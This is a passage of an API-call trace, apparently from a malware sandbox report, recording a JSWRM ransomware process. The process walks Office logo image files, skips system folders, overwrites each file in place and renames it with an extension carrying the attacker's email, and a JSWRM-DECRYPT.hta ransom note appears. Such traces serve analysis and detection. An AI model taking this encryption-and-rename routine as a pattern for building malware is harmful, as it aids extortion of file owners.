cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0132.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-140.png", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 29 [0132.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.898] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3446) returned 1 [0132.898] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.898] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0132.900] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.900] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0132.900] CloseHandle (hObject=0x238) returned 1 [0132.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.901] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11d7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.scale-180.png", cAlternateFileName="GR6942~1.PNG")) returned 1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2=".") returned 1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="..") returned 1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="...") returned 1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="windows") returned -1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0132.905] lstrcmpiW (lpString1="GrooveLogoSmall.scale-180.png", lpString2="msocache") returned -1 [0132.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-180.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0132.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-180.png", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 29 [0132.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-180.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0132.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-180.png", cchWideChar=29, lpMultiByteStr=0x2413a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 29 [0132.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.906] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4567) returned 1 [0132.906] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.906] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x11d0, lpOverlapped=0x0) returned 1 [0132.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.909] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x11d0, lpOverlapped=0x0) returned 1 [0132.909] CloseHandle (hObject=0x238) returned 1 [0132.910] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.911] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a63f068, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a63f068, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x850, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogoSmall.scale-80.png", cAlternateFileName="GR3369~1.PNG")) returned 1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2=".") returned 1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="..") returned 1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="...") returned 1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="windows") returned -1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0132.911] lstrcmpiW (lpString1="GrooveLogoSmall.scale-80.png", lpString2="msocache") returned -1 [0132.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-80.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-80.png", cchWideChar=28, lpMultiByteStr=0x240f70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 28 [0132.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-80.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogoSmall.scale-80.png", cchWideChar=28, lpMultiByteStr=0x241308, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 28 [0132.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.912] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2128) returned 1 [0132.912] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.912] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x850, lpOverlapped=0x0) returned 1 [0132.914] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.914] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x850, lpOverlapped=0x0) returned 1 [0132.914] CloseHandle (hObject=0x238) returned 1 [0132.914] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.918] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x458a2a58, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x458a2a58, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x458a2a58, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0132.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0132.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0132.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0132.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0132.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0132.919] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0132.919] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0132.919] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0132.919] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0132.919] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.919] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a63f068, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a63f068, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb7a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-black_scale-100.png", cAlternateFileName="MS0237~1.PNG")) returned 1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.919] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.920] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2938) returned 1 [0132.920] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.920] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb70, lpOverlapped=0x0) returned 1 [0133.013] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.014] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb70, lpOverlapped=0x0) returned 1 [0133.014] CloseHandle (hObject=0x238) returned 1 [0133.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.017] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a63f068, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a63f068, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe7d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-black_scale-140.png", cAlternateFileName="MS6F5E~1.PNG")) returned 1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.017] lstrcmpiW (lpString1="MsAccessLogo.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0133.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.019] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3709) returned 1 [0133.019] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.019] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe70, lpOverlapped=0x0) returned 1 [0133.021] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.021] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe70, lpOverlapped=0x0) returned 1 [0133.021] CloseHandle (hObject=0x238) returned 1 [0133.021] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft 